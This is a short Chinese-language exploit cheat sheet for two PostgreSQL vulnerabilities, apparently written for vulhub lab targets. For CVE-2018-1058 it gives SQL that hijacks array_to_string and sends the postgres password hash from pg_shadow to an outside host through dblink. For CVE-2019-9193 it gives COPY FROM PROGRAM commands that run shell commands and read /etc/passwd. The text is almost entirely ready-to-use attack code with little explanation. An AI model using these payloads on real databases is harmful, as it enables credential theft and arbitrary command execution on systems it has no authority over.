1.PostgreSQL 提权漏洞(CVE-2018-1058)
操作技巧:
psql.exe --host your-ip --username vulhub
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
select dblink_connect((select 'hostaddr=192.168.10.88 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;
漏洞原理:
漏洞版本:9.3-10
2.PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
操作技巧:
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'cat /etc/passwd';
SELECT * FROM cmd_exec;
漏洞原理:
需要超级管理员数据库用户(postgres)才可以,因为在9.3版本之后,默认得开启了COPY TO/FROM PROGRAM功能,可以让超级用户去执行任意系统命令
漏洞版本:9.3-11.2